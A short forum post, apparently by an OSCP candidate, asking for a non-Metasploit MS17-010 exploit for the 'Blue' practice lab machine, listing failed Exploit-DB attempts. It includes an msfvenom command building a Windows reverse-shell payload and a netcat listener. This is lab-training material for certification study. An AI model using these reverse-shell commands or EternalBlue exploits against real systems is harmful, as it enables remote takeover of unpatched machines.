Hey guys,
I stuck a little bit with the Blue box. Exploit it with metasploit easy, but as far I going to take OSCP exam - it’s not the case. Using metasploit and meterpreter prohibit during exam. So I looking for working and standalone exploit for ms17-010.
I found a few of them using searchsploit, but they doesn’t work for Blue host.
I tried the next ones:
EDB-ID: 42031 - It says that this exploit doesn support this target
EDB-ID: 42030 - failed due to NETBIOS connection timeout
EDB-ID: 42315 - failed with impacket.smb.SessionError: STATUS_ACCESS_DENIED
Payload:
msfvenom -p windows/shell/reverse_tcp -f bin -o payload.bin LPORT=443 LHOST=
Handler:
nc -v -lp 443
Could you suggest any working for Blue host exploit, except metasploit-based?